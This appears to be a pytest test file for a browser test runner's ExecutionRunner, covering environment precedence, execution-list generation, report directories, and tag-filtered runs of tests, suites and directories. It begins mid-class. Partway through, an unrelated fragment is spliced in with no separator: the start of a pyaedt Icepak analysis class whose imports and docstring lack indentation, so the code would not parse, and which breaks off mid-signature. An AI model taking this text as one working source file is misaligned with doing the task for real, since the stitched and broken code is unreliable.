        result = exc_runner.define_browsers([], self.remote_browsers,
                                            self.default_browsers)
        assert result == []

    def test_define_browsers_driver_is_not_defined(self):
        """Verify that _define_browsers raises the correct exception
        when a driver name that is not defined is passed
        """
        expected_msg = ''.join([
            'Error: the browser {} is not defined\n'.format('not_defined'),
            'available options are:\n',
            '\n'.join(self.default_browsers),
            '\n'.join(list(self.remote_browsers.keys())),
        ])
        with pytest.raises(Exception) as excinfo:
            _ = exc_runner.define_browsers(['not_defined'], self.remote_browsers,
                                           self.default_browsers)
        assert str(excinfo.value) == expected_msg

    def test_define_browsers_browser_order_of_preference(self):
        """Verify that _define_browsers selects the drivers in the correct
        order of precedence, first remote drivers then predefined drivers"""
        # the same name exists both as a remote and a predefined browser
        remote = {
            'chromex': {
                'browserName': 'chrome',
                'version': '60.0',
                'platform': 'macOS 10.12'
            }
        }
        defined = exc_runner.define_browsers(['chromex'], remote, ['chromex'])
        assert len(defined) == 1
        assert defined[0]['remote'] is True
        assert defined[0]['capabilities']['version'] == '60.0'
class TestSelectEnvironments:
    """Tests for ExecutionRunner._select_environments.

    Precedence verified by these tests: CLI envs > suite envs > first
    project env > empty.
    """

    @pytest.mark.slow
    def test__select_environments(self, project_session):
        """Verify that _select_environments uses the correct order
        of precedence"""
        _, project = project_session.activate()
        cli_envs = ['cli_env_1', 'cli_env_2']
        execution_runner = exc_runner.ExecutionRunner()
        execution_runner.project = project
        execution_runner.cli_args.envs = cli_envs
        execution_runner.suite.envs = ['suite_env_1', 'suite_env_2']
        project_envs = environment_manager.get_envs(project)
        result_envs = execution_runner._select_environments(project_envs)
        # CLI envs beat both suite envs and project envs
        assert result_envs == cli_envs

    @pytest.mark.slow
    def test__select_environments_cli_envs_empty(self, project_function):
        """Verify that _select_environments uses the correct order
        of precedence when cli environments is empty"""
        testdir, project = project_function.activate()
        cli_envs = []
        suite_envs = ['suite_env_1', 'suite_env_2']
        execution_runner = exc_runner.ExecutionRunner()
        execution_runner.project = project
        execution_runner.cli_args.envs = cli_envs
        execution_runner.suite.envs = suite_envs
        # fix: write environments.json inside the project, as
        # environment_manager reads it from there (the original wrote it
        # to the testdir root where it was never picked up)
        path = os.path.join(testdir, 'projects', project, 'environments.json')
        with open(path, 'w+') as f:
            f.write('{"env1": {}, "env2": {}}')
        project_envs = environment_manager.get_envs(project)
        result_envs = execution_runner._select_environments(project_envs)
        # suite envs beat project envs
        assert result_envs == suite_envs

    @pytest.mark.slow
    def test__select_environments_cli_envs_empty_suite_envs_empty(self, project_function):
        """Verify that _select_environments uses the correct order
        of precedence when cli environments and suite environments are empty"""
        testdir, project = project_function.activate()
        execution_runner = exc_runner.ExecutionRunner()
        execution_runner.project = project
        execution_runner.cli_args.envs = []
        execution_runner.suite.envs = []
        path = os.path.join(testdir, 'projects', project, 'environments.json')
        with open(path, 'w+') as f:
            f.write('{"env3": {}, "env4": {}}')
        project_envs = environment_manager.get_envs(project)
        result_envs = execution_runner._select_environments(project_envs)
        # with no CLI/suite envs, the first project env is selected
        assert result_envs == ['env3']

    @pytest.mark.slow
    def test__select_environments_all_envs_empty(self, project_function):
        """Verify that _select_environments uses the correct order
        of precedence when cli environments, suite environments and
        project environments are empty"""
        _, project = project_function.activate()
        execution_runner = exc_runner.ExecutionRunner()
        execution_runner.project = project
        execution_runner.cli_args.envs = []
        # fix: the original assigned cli_args.envs twice (copy-paste bug)
        # and never cleared suite.envs, so the "all empty" scenario was
        # not fully exercised
        execution_runner.suite.envs = []
        project_envs = environment_manager.get_envs(project)
        result_envs = execution_runner._select_environments(project_envs)
        assert result_envs == []
class TestDefineExecutionList:
    """Tests for ExecutionRunner._define_execution_list.

    The execution list contains one SimpleNamespace entry per
    (test, data set, browser, environment) combination.
    """

    @pytest.mark.slow
    def test_define_execution_list(self, project_function_clean):
        """Verify that the execution list is generated properly when there's only
        one test without datasets, one driver and zero environments
        """
        project_function_clean.activate()
        execution_runner = exc_runner.ExecutionRunner()
        execution_runner.tests = ['test_001']
        execution_runner.execution.processes = 1
        execution_runner.execution.browsers = ['chrome']
        execution_runner.execution.envs = []
        execution_runner.project = project_function_clean.name
        execution_list = execution_runner._define_execution_list()
        expected_list = [
            SimpleNamespace(name='test_001', data_set={}, secrets={}, browser='chrome',
                            reportdir=None, env=None)
        ]
        assert execution_list == expected_list

    @pytest.mark.slow
    def test_define_execution_list_multiple_data_sets(self, project_function_clean):
        """Verify that the execution list is generated properly when a test
        has multiple data sets
        """
        _, project = project_function_clean.activate()
        test_name = 'test_002'
        test.create_test(project, test_name)
        tdata = [
            {
                'col1': 'a',
                'col2': 'b'
            },
            {
                'col1': 'c',
                'col2': 'd',
            }
        ]
        test_data.save_external_test_data_file(project, test_name, tdata)
        execution_runner = exc_runner.ExecutionRunner()
        execution_runner.tests = [test_name]
        execution_runner.execution.processes = 1
        execution_runner.execution.browsers = ['chrome']
        execution_runner.execution.envs = []
        execution_runner.project = project_function_clean.name
        execution_list = execution_runner._define_execution_list()
        # one entry per data set
        expected_list = [
            SimpleNamespace(name=test_name, data_set={'col1': 'a', 'col2': 'b'}, secrets={},
                            browser='chrome', reportdir=None, env=None),
            SimpleNamespace(name=test_name, data_set={'col1': 'c', 'col2': 'd'}, secrets={},
                            browser='chrome', reportdir=None, env=None)
        ]
        assert execution_list == expected_list

    @pytest.mark.slow
    def test_define_execution_list_multiple_tests(self, project_function_clean):
        """Verify that the execution list is generated properly when there
        are multiple tests in the list
        """
        _, project = project_function_clean.activate()
        # create test one
        test_name_one = 'test_one_001'
        test.create_test(project, test_name_one)
        tdata = [
            {
                'col1': 'a',
                'col2': 'b'
            },
            {
                'col1': 'c',
                'col2': 'd',
            }
        ]
        test_data.save_external_test_data_file(project, test_name_one, tdata)
        # create test two
        test_name_two = 'test_two_001'
        test.create_test(project, test_name_two)
        execution_runner = exc_runner.ExecutionRunner()
        execution_runner.tests = [test_name_one, test_name_two]
        execution_runner.execution.processes = 1
        execution_runner.execution.browsers = ['chrome']
        execution_runner.execution.envs = []
        execution_runner.project = project
        execution_list = execution_runner._define_execution_list()
        # test one expands into its two data sets; test two has none
        expected_list = [
            SimpleNamespace(name='test_one_001', data_set={'col1': 'a', 'col2': 'b'}, secrets={},
                            browser='chrome', reportdir=None, env=None),
            SimpleNamespace(name='test_one_001', data_set={'col1': 'c', 'col2': 'd'}, secrets={},
                            browser='chrome', reportdir=None, env=None),
            SimpleNamespace(name='test_two_001', data_set={}, secrets={},
                            browser='chrome', reportdir=None, env=None)
        ]
        assert execution_list == expected_list

    @pytest.mark.slow
    def test_define_execution_list_multiple_envs(self, project_function_clean):
        """Verify that the execution list is generated properly when the execution
        has multiple envs
        """
        _, project = project_function_clean.activate()
        # create test one
        test_name_one = 'test_one_003'
        test.create_test(project, test_name_one)
        # create two environments in environments.json
        env_data = {
            "stage": {"url": "xxx"},
            "preview": {"url": "yyy"}
        }
        env_data_json = json.dumps(env_data)
        environment_manager.save_environments(project, env_data_json)
        execution_runner = exc_runner.ExecutionRunner()
        execution_runner.tests = [test_name_one]
        execution_runner.execution.processes = 1
        execution_runner.execution.browsers = ['chrome']
        execution_runner.execution.envs = ['stage', 'preview']
        execution_runner.project = project
        execution_list = execution_runner._define_execution_list()
        # each env is injected into the data set under the 'env' key
        expected_list = [
            SimpleNamespace(name='test_one_003', data_set={'env': {'url': 'xxx', 'name': 'stage'}}, secrets={},
                            browser='chrome', reportdir=None, env='stage'),
            SimpleNamespace(name='test_one_003', data_set={'env': {'url': 'yyy', 'name': 'preview'}}, secrets={},
                            browser='chrome', reportdir=None, env='preview')
        ]
        assert execution_list == expected_list

    @pytest.mark.slow
    def test_define_execution_list_multiple_drivers(self, project_function_clean):
        """Verify that the execution list is generated properly when there
        are multiple drivers in the list
        """
        _, project = project_function_clean.activate()
        # create test one
        test_name_one = 'test_one_004'
        test.create_test(project, test_name_one)
        # create test two
        test_name_two = 'test_two_004'
        test.create_test(project, test_name_two)
        execution_runner = exc_runner.ExecutionRunner()
        execution_runner.tests = [test_name_one, test_name_two]
        execution_runner.execution.processes = 1
        execution_runner.execution.browsers = ['chrome', 'firefox']
        execution_runner.execution.envs = []
        execution_runner.project = project
        execution_list = execution_runner._define_execution_list()
        # cartesian product: 2 tests x 2 browsers
        expected_list = [
            SimpleNamespace(name='test_one_004', data_set={}, secrets={}, browser='chrome', reportdir=None, env=None),
            SimpleNamespace(name='test_one_004', data_set={}, secrets={}, browser='firefox', reportdir=None, env=None),
            SimpleNamespace(name='test_two_004', data_set={}, secrets={}, browser='chrome', reportdir=None, env=None),
            SimpleNamespace(name='test_two_004', data_set={}, secrets={}, browser='firefox', reportdir=None, env=None)
        ]
        assert execution_list == expected_list

    @pytest.mark.slow
    def test_define_execution_list_multiple_tests_datasets_drivers_envs(
            self, project_function_clean):
        """Verify that the execution list is generated properly when there
        are multiple tests, data sets, drivers and environments
        """
        _, project = project_function_clean.activate()
        # create test one
        test_name_one = 'test_one_005'
        test.create_test(project, test_name_one)
        # test data for test one
        tdata = [
            {'col1': 'a'},
            {'col1': 'b'}
        ]
        test_data.save_external_test_data_file(project, test_name_one, tdata)
        # create test two
        test_name_two = 'test_two_005'
        test.create_test(project, test_name_two)
        # create two environments
        env_data = {
            "stage": {"url": "xxx"},
            "preview": {"url": "yyy"}
        }
        env_data_json = json.dumps(env_data)
        environment_manager.save_environments(project, env_data_json)
        execution_runner = exc_runner.ExecutionRunner()
        execution_runner.tests = [test_name_one, test_name_two]
        execution_runner.execution.processes = 1
        execution_runner.execution.browsers = ['chrome', 'firefox']
        execution_runner.execution.envs = ['stage', 'preview']
        execution_runner.project = project
        execution_list = execution_runner._define_execution_list()
        # full cartesian product: (2 data sets + none) x 2 browsers x 2 envs
        expected_list = [
            SimpleNamespace(browser='chrome', data_set={'col1': 'a', 'env': {'url': 'xxx', 'name': 'stage'}},
                            secrets={}, name='test_one_005', reportdir=None, env='stage'),
            SimpleNamespace(browser='firefox', data_set={'col1': 'a', 'env': {'url': 'xxx', 'name': 'stage'}},
                            secrets={}, name='test_one_005', reportdir=None, env='stage'),
            SimpleNamespace(browser='chrome', data_set={'col1': 'a', 'env': {'url': 'yyy', 'name': 'preview'}},
                            secrets={}, name='test_one_005', reportdir=None, env='preview'),
            SimpleNamespace(browser='firefox', data_set={'col1': 'a', 'env': {'url': 'yyy', 'name': 'preview'}},
                            secrets={}, name='test_one_005', reportdir=None, env='preview'),
            SimpleNamespace(browser='chrome', data_set={'col1': 'b', 'env': {'url': 'xxx', 'name': 'stage'}},
                            secrets={}, name='test_one_005', reportdir=None, env='stage'),
            SimpleNamespace(browser='firefox', data_set={'col1': 'b', 'env': {'url': 'xxx', 'name': 'stage'}},
                            secrets={}, name='test_one_005', reportdir=None, env='stage'),
            SimpleNamespace(browser='chrome', data_set={'col1': 'b', 'env': {'url': 'yyy', 'name': 'preview'}},
                            secrets={}, name='test_one_005', reportdir=None, env='preview'),
            SimpleNamespace(browser='firefox', data_set={'col1': 'b', 'env': {'url': 'yyy', 'name': 'preview'}},
                            secrets={}, name='test_one_005', reportdir=None, env='preview'),
            SimpleNamespace(browser='chrome', data_set={'env': {'url': 'xxx', 'name': 'stage'}},
                            secrets={}, name='test_two_005', reportdir=None, env='stage'),
            SimpleNamespace(browser='firefox', data_set={'env': {'url': 'xxx', 'name': 'stage'}},
                            secrets={}, name='test_two_005', reportdir=None, env='stage'),
            SimpleNamespace(browser='chrome', data_set={'env': {'url': 'yyy', 'name': 'preview'}},
                            secrets={}, name='test_two_005', reportdir=None, env='preview'),
            SimpleNamespace(browser='firefox', data_set={'env': {'url': 'yyy', 'name': 'preview'}},
                            secrets={}, name='test_two_005', reportdir=None, env='preview')
        ]
        assert execution_list == expected_list

    @pytest.mark.slow
    def test_define_execution_list_with_secrets(self, project_function_clean):
        """Verify that the execution list is generated properly when there's only
        one test without datasets, one driver and zero environments
        """
        _, project = project_function_clean.activate()
        # the project's secrets.json is attached to every execution entry
        secrets = {"a": "secret", "b": "secret02"}
        secrets_path = os.path.join(project_function_clean.path, 'secrets.json')
        with open(secrets_path, 'w') as secrets_file:
            secrets_file.write(json.dumps(secrets, indent=True))
        execution_runner = exc_runner.ExecutionRunner()
        execution_runner.tests = ['test_001']
        execution_runner.execution.processes = 1
        execution_runner.execution.browsers = ['chrome']
        execution_runner.execution.envs = []
        execution_runner.project = project
        execution_list = execution_runner._define_execution_list()
        expected_list = [
            SimpleNamespace(name='test_001', data_set={}, secrets={"a": "secret", "b": "secret02"}, browser='chrome', reportdir=None, env=None)
        ]
        assert execution_list == expected_list
class TestCreateExecutionDirectory:
    """Tests for ExecutionRunner._create_execution_directory."""

    @pytest.mark.slow
    def test__create_execution_directory_is_suite(self, project_class):
        """Verify that create_execution_directory works as expected when
        a suite is passed on
        """
        _, project = project_class.activate()
        ts = utils.get_timestamp()
        runner = exc_runner.ExecutionRunner()
        runner.tests = ['test_foo']
        runner.project = project
        runner.is_suite = True
        runner.suite_name = 'bar'
        runner.timestamp = ts
        runner._create_execution_directory()
        # suite executions live under reports/<suite_name>/<timestamp>
        expected = os.path.join(project_class.path, 'reports', 'bar', ts)
        assert os.path.isdir(expected)

    @pytest.mark.slow
    def test__create_execution_directory_is_not_suite(self, project_class):
        """Verify that create_execution_directory works as expected when
        a not suite is passed on
        """
        _, project = project_class.activate()
        ts = utils.get_timestamp()
        runner = exc_runner.ExecutionRunner()
        runner.test_name = 'foo'
        runner.project = project
        runner.is_suite = False
        runner.timestamp = ts
        runner._create_execution_directory()
        # single tests live under reports/single_tests/<test_name>/<timestamp>
        expected = os.path.join(project_class.path, 'reports', 'single_tests', 'foo', ts)
        assert os.path.isdir(expected)
class TestRunSingleTest:
    """Tests for ExecutionRunner.run_test."""

    @pytest.mark.slow
    def test_run_single_test(self, project_class, test_utils):
        """Running a single test creates its report directory containing
        one test-set directory plus report.json."""
        testdir, project = project_class.activate()
        test_name = 'foo001'
        timestamp = utils.get_timestamp()
        session.settings = settings_manager.get_project_settings(project)
        test_utils.create_test(project, test_name)
        execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'], timestamp=timestamp)
        execution_runner.project = project
        execution_runner.run_test(test_name)
        test_report_dir = os.path.join(testdir, 'projects', project, 'reports',
                                       'single_tests', test_name, timestamp)
        assert os.path.isdir(test_report_dir)
        items = os.listdir(test_report_dir)
        # test set dir + report.json
        assert len(items) == 2

    @pytest.mark.slow
    def test_run_single_test_with_two_sets(self, project_class, test_utils, capsys):
        """Run a single test with two data sets.
        It should display the number of tests and test sets found."""
        testdir, project = project_class.activate()
        test_name = 'foo002'
        timestamp = utils.get_timestamp()
        session.settings = settings_manager.get_project_settings(project)
        content = ('data = [{"foo": 1}, {"foo": 2}]\n'
                   'def test(data):\n'
                   ' pass\n')
        test_utils.create_test(project, test_name, content=content)
        execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'], timestamp=timestamp)
        execution_runner.project = project
        execution_runner.run_test(test_name)
        out, err = capsys.readouterr()
        # number of tests is displayed
        assert 'Tests found: 1 (2 sets)' in out
        test_report_dir = os.path.join(testdir, 'projects', project, 'reports',
                                       'single_tests', test_name, timestamp)
        assert os.path.isdir(test_report_dir)
        items = os.listdir(test_report_dir)
        # two test set dirs + report.json
        assert len(items) == 3

    @pytest.mark.slow
    def test_run_single_test_filter_by_tags(self, project_class, test_utils):
        """Run a single test with filtering by tags"""
        testdir, project = project_class.activate()
        test_name = 'foo003'
        timestamp = utils.get_timestamp()
        session.settings = settings_manager.get_project_settings(project)
        content = ('tags = ["alfa", "bravo"]\n'
                   'def test(data):\n'
                   ' pass\n')
        test_utils.create_test(project, test_name, content=content)
        execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'], timestamp=timestamp,
                                                      tags=['alfa'])
        execution_runner.project = project
        execution_runner.run_test(test_name)
        test_report_dir = os.path.join(testdir, 'projects', project, 'reports',
                                       'single_tests', test_name, timestamp)
        assert os.path.isdir(test_report_dir)
        items = os.listdir(test_report_dir)
        # test set dir + report.json
        assert len(items) == 2

    @pytest.mark.slow
    def test_run_single_test_with_invalid_tags(self, project_class, test_utils, capsys):
        """A tag that matches no test runs nothing; the report directory
        ends up containing only report.json."""
        testdir, project = project_class.activate()
        test_name = 'foo004'
        timestamp = utils.get_timestamp()
        content = ('tags = ["alfa", "bravo"]\n'
                   'def test(data):\n'
                   ' pass\n')
        test_utils.create_test(project, test_name, content=content)
        execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'], timestamp=timestamp,
                                                      tags=['charlie'])
        execution_runner.project = project
        execution_runner.run_test(test_name)
        out, err = capsys.readouterr()
        assert 'No tests found with tag(s): charlie' in out
        test_report_dir = os.path.join(testdir, 'projects', project, 'reports',
                                       'single_tests', test_name, timestamp)
        assert os.path.isdir(test_report_dir)
        items = os.listdir(test_report_dir)
        # only report.json is present
        assert items == ['report.json']
class TestRunSuite:
    """Tests for ExecutionRunner.run_suite."""

    @pytest.fixture(scope="class")
    def _project_with_tags(self, project_class, test_utils):
        """A fixture of a project with tests that contain tags

        Creates four tests: two tagged ('alfa'/'bravo' and
        'bravo'/'charlie'), one with an empty tags list, and one
        without a tags variable.
        """
        _, project = project_class.activate()
        tests = SimpleNamespace()
        base_content = 'def test(data):\n pass\n'
        tests.test_alfa_bravo = 'test_alfa_bravo'
        content = 'tags = ["alfa", "bravo"]'
        test_utils.create_test(project, tests.test_alfa_bravo, content=base_content+content)
        tests.test_bravo_charlie = 'test_bravo_charlie'
        content = 'tags = ["bravo", "charlie"]'
        test_utils.create_test(project, tests.test_bravo_charlie, content=base_content+content)
        tests.test_empty_tags = 'test_empty_tags'
        content = 'tags = []'
        test_utils.create_test(project, tests.test_empty_tags, content=base_content+content)
        tests.test_no_tags = 'test_no_tags'
        content = 'def test(data):\n pass'
        test_utils.create_test(project, tests.test_no_tags, content=base_content+content)
        # expose the created test names to the test methods
        project_class.tests = list(tests.__dict__)
        project_class.t = tests
        return project_class

    @pytest.mark.slow
    def test_run_suite(self, _project_with_tags, test_utils, capsys):
        # a suite containing two tests runs both of them
        _, project = _project_with_tags.activate()
        suite_name = test_utils.random_numeric_string(10, 'suite')
        tests = [_project_with_tags.t.test_alfa_bravo,
                 _project_with_tags.t.test_bravo_charlie]
        test_utils.create_suite(project, suite_name, tests=tests)
        timestamp = utils.get_timestamp()
        execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'], timestamp=timestamp)
        execution_runner.project = project
        execution_runner.run_suite(suite_name)
        out, err = capsys.readouterr()
        assert 'Tests found: 2' in out
        data = exec_report.get_execution_data(project=project, suite=suite_name, execution=timestamp)
        assert data['has_finished'] is True
        assert data['total_tests'] == 2

    def test_run_suite_without_tests(self, _project_with_tags, test_utils, capsys):
        # an empty suite still produces a finished report with zero tests
        _, project = _project_with_tags.activate()
        suite_name = test_utils.random_numeric_string(10, 'suite')
        test_utils.create_suite(project, suite_name, tests=[])
        timestamp = utils.get_timestamp()
        execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'], timestamp=timestamp)
        execution_runner.project = project
        execution_runner.run_suite(suite_name)
        out, err = capsys.readouterr()
        assert 'No tests found for suite {}'.format(suite_name) in out
        data = exec_report.get_execution_data(project=project, suite=suite_name, execution=timestamp)
        assert data['has_finished'] is True
        assert data['total_tests'] == 0

    @pytest.mark.slow
    def test_run_suite_filter_by_tags(self, _project_with_tags, test_utils, capsys):
        # only test_alfa_bravo carries both 'alfa' and 'bravo'
        _, project = _project_with_tags.activate()
        suite_name = test_utils.random_numeric_string(10, 'suite')
        tests = [_project_with_tags.t.test_alfa_bravo,
                 _project_with_tags.t.test_bravo_charlie]
        test_utils.create_suite(project, suite_name, tests=tests)
        timestamp = utils.get_timestamp()
        execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'],
                                                      timestamp=timestamp,
                                                      tags=['alfa', 'bravo'])
        execution_runner.project = project
        execution_runner.run_suite(suite_name)
        out, err = capsys.readouterr()
        assert 'Tests found: 1' in out
        data = exec_report.get_execution_data(project=project, suite=suite_name, execution=timestamp)
        assert data['has_finished'] is True
        assert data['total_tests'] == 1

    @pytest.mark.slow
    def test_run_suite_filter_by_invalid_tags(self, _project_with_tags, test_utils, capsys):
        # tags matching no test: nothing runs, report is still generated
        _, project = _project_with_tags.activate()
        suite_name = test_utils.random_numeric_string(10, 'suite')
        tests = [_project_with_tags.t.test_alfa_bravo,
                 _project_with_tags.t.test_bravo_charlie]
        test_utils.create_suite(project, suite_name, tests=tests)
        timestamp = utils.get_timestamp()
        execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'],
                                                      timestamp=timestamp,
                                                      tags=['sierra', 'tango'])
        execution_runner.project = project
        execution_runner.run_suite(suite_name)
        out, err = capsys.readouterr()
        assert 'No tests found with tag(s): sierra, tango' in out
        data = exec_report.get_execution_data(project=project, suite=suite_name, execution=timestamp)
        assert data['has_finished'] is True
        assert data['total_tests'] == 0

    def test_run_suite_filter_by_invalid_tag_expression(self, _project_with_tags,
                                                        test_utils, capsys):
        """When an invalid tag expression is used a message is displayed
        to the console, no tests are run, the report is generated,
        and the execution exits with status code 1
        """
        _, project = _project_with_tags.activate()
        suite_name = test_utils.random_numeric_string(10, 'suite')
        tests = [_project_with_tags.t.test_alfa_bravo,
                 _project_with_tags.t.test_bravo_charlie]
        test_utils.create_suite(project, suite_name, tests=tests)
        timestamp = utils.get_timestamp()
        # '=' (assignment) is not a valid operator inside a tag expression
        execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'],
                                                      timestamp=timestamp,
                                                      tags=['sierra = tango'])
        execution_runner.project = project
        with pytest.raises(SystemExit):
            execution_runner.run_suite(suite_name)
        out, err = capsys.readouterr()
        # the repr of the offending AST node differs across Python versions
        expected = ("InvalidTagExpression: unknown expression <class '_ast.Assign'>, the "
                    "only valid operators for tag expressions are: 'and', 'or' & 'not'")
        # TODO: py 3.9
        expected2 = ("InvalidTagExpression: unknown expression <class 'ast.Assign'>, the "
                     "only valid operators for tag expressions are: 'and', 'or' & 'not'")
        assert expected in out or expected2 in out
        data = exec_report.get_execution_data(project=project, suite=suite_name, execution=timestamp)
        assert data['has_finished'] is True
        assert data['total_tests'] == 0
class TestRunDirectory:

    @pytest.fixture(scope="class")
    def _project_with_tags(self, project_class, test_utils):
        """A fixture of a project with tests that contain tags.

        Layout: two tagged tests inside the ``foo`` directory, one top-level
        test with an empty tag list, one top-level test without tags, and an
        empty ``empty`` test directory.
        """
        testdir, project = project_class.activate()
        tests = SimpleNamespace()
        base_content = 'def test(data):\n pass\n'
        tests.test_alfa_bravo = 'test_alfa_bravo'
        content = 'tags = ["alfa", "bravo"]'
        test_name = '{}.{}'.format('foo', tests.test_alfa_bravo)
        test_utils.create_test(project, test_name, content=base_content + content)
        tests.test_bravo_charlie = 'test_bravo_charlie'
        content = 'tags = ["bravo", "charlie"]'
        test_name = '{}.{}'.format('foo', tests.test_bravo_charlie)
        test_utils.create_test(project, test_name, content=base_content + content)
        tests.test_empty_tags = 'test_empty_tags'
        content = 'tags = []'
        test_utils.create_test(project, tests.test_empty_tags, content=base_content + content)
        tests.test_no_tags = 'test_no_tags'
        # base_content already defines the test function. The original code
        # appended a second 'def test(data)' block here, duplicating the
        # definition in the generated file; base_content alone is enough for
        # a test without tags.
        test_utils.create_test(project, tests.test_no_tags, content=base_content)
        path_list = [testdir, 'projects', project, 'tests', 'empty']
        file_manager.create_directory(path_list=path_list, add_init=True)
        project_class.tests = list(tests.__dict__)
        project_class.t = tests
        return project_class

    @pytest.mark.slow
    def test_run_directory(self, _project_with_tags, capsys):
        """Running a directory executes only the tests inside it."""
        _, project = _project_with_tags.activate()
        timestamp = utils.get_timestamp()
        execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'], timestamp=timestamp)
        execution_runner.project = project
        execution_runner.run_directory('foo')
        out, err = capsys.readouterr()
        # Only the two tests created under 'foo' should be collected.
        assert 'Tests found: 2' in out
        data = exec_report.get_execution_data(project=project, suite='foo', execution=timestamp)
        assert data['has_finished'] is True
        assert data['total_tests'] == 2

    def test_run_directory_without_tests(self, _project_with_tags, capsys):
        """Running an empty directory reports that no tests were found and
        still generates a finished report with zero tests.
        """
        _, project = _project_with_tags.activate()
        timestamp = utils.get_timestamp()
        dirname = 'empty'
        execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'], timestamp=timestamp)
        execution_runner.project = project
        execution_runner.run_directory(dirname)
        out, err = capsys.readouterr()
        expected = 'No tests were found in {}'.format(os.path.join('tests', dirname))
        assert expected in out
        data = exec_report.get_execution_data(project=project, suite=dirname, execution=timestamp)
        assert data['has_finished'] is True
        assert data['total_tests'] == 0

    @pytest.mark.slow
    def test_run_directory_filter_by_tags(self, _project_with_tags, test_utils, capsys):
        """Tags filter the tests collected from a directory."""
        _, project = _project_with_tags.activate()
        timestamp = utils.get_timestamp()
        dirname = 'foo'
        # Only test_alfa_bravo carries both 'alfa' and 'bravo'.
        execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'],
                                                      timestamp=timestamp,
                                                      tags=['alfa', 'bravo'])
        execution_runner.project = project
        execution_runner.run_directory(dirname)
        out, err = capsys.readouterr()
        assert 'Tests found: 1' in out
        data = exec_report.get_execution_data(project=project, suite=dirname, execution=timestamp)
        assert data['has_finished'] is True
        assert data['total_tests'] == 1
class TestRunWithEnvs:

    @pytest.mark.slow
    def test_run_with_environments(self, project_function, test_utils, capsys):
        """Running against two environments produces one test set per environment."""
        _, project = project_function.activate()
        environment_manager.save_environments(project, json.dumps({'test': {}, 'stage': {}}))
        test_utils.create_test(project, 'test01')
        timestamp = utils.get_timestamp()
        runner = exc_runner.ExecutionRunner(browsers=['chrome'],
                                            timestamp=timestamp,
                                            environments=['test', 'stage'])
        runner.project = project
        runner.run_directory('')
        captured = capsys.readouterr()
        assert 'Tests found: 1 (2 sets)' in captured.out
        report = exec_report.get_execution_data(project=project, suite='all', execution=timestamp)
        assert report['has_finished'] is True
        assert report['total_tests'] == 2

    def test_run_with_not_existing_environments(self, project_function, test_utils, capsys):
        """Running with an unknown environment prints an error and exits
        with status code 1; the report shows zero tests.
        """
        _, project = project_function.activate()
        test_utils.create_test(project, 'test01')
        timestamp = utils.get_timestamp()
        runner = exc_runner.ExecutionRunner(browsers=['chrome'],
                                            timestamp=timestamp,
                                            environments=['not_existing'])
        runner.project = project
        with pytest.raises(SystemExit) as exit_info:
            runner.run_directory('')
        assert exit_info.value.code == 1
        captured = capsys.readouterr()
        expected = ('ERROR: the following environments do not exist for project {}: '
                    'not_existing'.format(project))
        assert expected in captured.out
        report = exec_report.get_execution_data(project=project, suite='all', execution=timestamp)
        assert report['has_finished'] is True
        assert report['total_tests'] == 0
import csv
import re
import os
from pyaedt.generic.general_methods import aedt_exception_handler, generate_unique_name, is_ironpython
from pyaedt.application.Analysis import Analysis
from pyaedt.modeler.Model3D import Modeler3D
from pyaedt.modules.MeshIcepak import IcepakMesh
if is_ironpython:
from pyaedt.modules.PostProcessor import PostProcessor
else:
from pyaedt.modules.AdvancedPostProcessing import PostProcessor
class FieldAnalysisIcepak(Analysis, object):
"""Manages 3D field analysis setup in Icepak.
This class is automatically initialized by an appliation call from
HFSS, Icepak, Q3D, or Maxwell 3D. See the application function
for parameter definitions.
Parameters
----------
application : str
Application that is to initialize the call.
projectname : str, optional
Name of the project to select or the full path to the project
or AEDTZ archive to open. The default is ``None``, in which
case an attempt is made to get an active project. If no
projects are present, an empty project is created.
designname : str, optional
Name of the design to select. The default is ``None``, in
which case an attempt is made to get an active design. If no
designs are present, an empty design is created.
solutiontype : str, optional
Solution type to apply to the design. The default is
``None``, in which case the default type is applied.
setup_name : str, optional
Name of the setup to use as the nominal. The default is
``None``, in which case the active setup is used or
nothing is used.
specified_version : str, optional
Version of AEDT to use. The default is ``None``, in which case
the active version or latest installed version is used.
NG : bool, optional
Whether to run AEDT in the non-graphical mode. The default
is ``False``, in which case AEDT launches in the graphical mode.
new_desktop_session : bool, optional
Whether to launch an instance of AEDT in a new thread, even if
another instance of the ``specified_version`` is active on the
machine. The default is ``True``.
close_on_exit : bool, optional
Whether to release AEDT on exit. The default is ``False``.
student_version : bool, optional
Whether to enable the student version of AEDT. The default
is ``False``.
"""
    def __init__(
        self,
        application,
        projectname,
        designname,
        solutiontype,
        setup_name=None,
        specified_version=None,
        non_graphical=False,
        new_desktop_session=False,
        close_on_exit=False,
        student_version=False,
    ):
        # All parameters are documented in the class docstring; they are
        # forwarded unchanged to the Analysis base class, which handles
        # project/design selection and the desktop session.
        Analysis.__init__(
            self,
            application,
            projectname,
            designname,
            solutiontype,
            setup_name,
            specified_version,
            non_graphical,
            new_desktop_session,
            close_on_exit,
            student_version,
        )
        # Cache the AEDT design modules and helper objects that the
        # read-only properties of this class expose.
        self._osolution = self._odesign.GetModule("Solutions")
        self._oboundary = self._odesign.GetModule("BoundarySetup")
        self._modeler = Modeler3D(self)
        self._mesh = IcepakMesh(self)
        self._post = PostProcessor(self)
    @property
    def osolution(self):
        """AEDT ``Solutions`` module of the active design.

        References
        ----------

        >>> oModule = oDesign.GetModule("Solutions")
        """
        return self._osolution
    @property
    def oboundary(self):
        """AEDT ``BoundarySetup`` module of the active design.

        References
        ----------

        >>> oModule = oDesign.GetModule("BoundarySetup")
        """
        return self._oboundary
    @property
    def modeler(self):
        """3D modeler associated with this design.

        Returns
        -------
        :class:`pyaedt.modeler.Model3D.Modeler3D`
        """
        return self._modeler
    @property
    def mesh(self):
        """Icepak mesh manager for this design.

        Returns
        -------
        :class:`pyaedt.modules.MeshIcepak.IcepakMesh`
        """
        return self._mesh
    @aedt_exception_handler
    def plot(
        self,
        objects=None,
        show=True,
        export_path=None,
        plot_as_separate_objects=True,
        plot_air_objects=True,
